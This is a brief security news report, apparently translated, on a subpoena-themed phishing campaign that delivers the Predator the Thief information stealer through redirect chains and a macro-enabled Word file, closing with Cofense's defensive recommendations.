Cofense, a cybersecurity company, discovered a new phishing campaign targeting users via email on the subject of the subpoena that appears to come from the UK Department of Justice with the ultimate goal of infecting their systems. with malicious software information stealers.
Employees of insurance companies and retailers received these phishing emails stating that the recipient had been summoned and that they needed to click a link in the email to get more details about their case.
The provided link uses trusted sources, including Google Docs and Microsoft OneDrive, for the infection chain. Although the Google Docs link is not malicious, it does contain a redirect chain that ultimately leads to a malicious macro-filled Microsoft Word file. Once executed, the macro downloads a sample of the Predator the Thief malware via PowerShell.
The initial email also contains a warning that the recipient has 14 days to comply with the assignment notification, which is a scare tactic designed to entice users to click on the link in the message.
predator the thief
Predator the Thief has all the basic features of most information thieves. However, one of the unique benefits of this malware is the wide range of web browsers it targets, which means that even those using a less popular web browser could be affected.
Malware authors use a Telegram channel to distribute their product, but it also works as a customer support channel.
Predator the Thief targets cryptocurrency wallets, browser information, FTP credentials, and email. The malware also takes a screenshot of the infected machine and this information is sent back to a command and control (C2) server via an HTTP POST.
Once the target information is collected and the sample is sent to C2, the binary cleans up some parts of the infection and automatically terminates. This makes it much more difficult to discover malware.
To avoid falling victim to this latest phishing campaign, Cofense recommends disabling default Microsoft macros and using endpoint protection.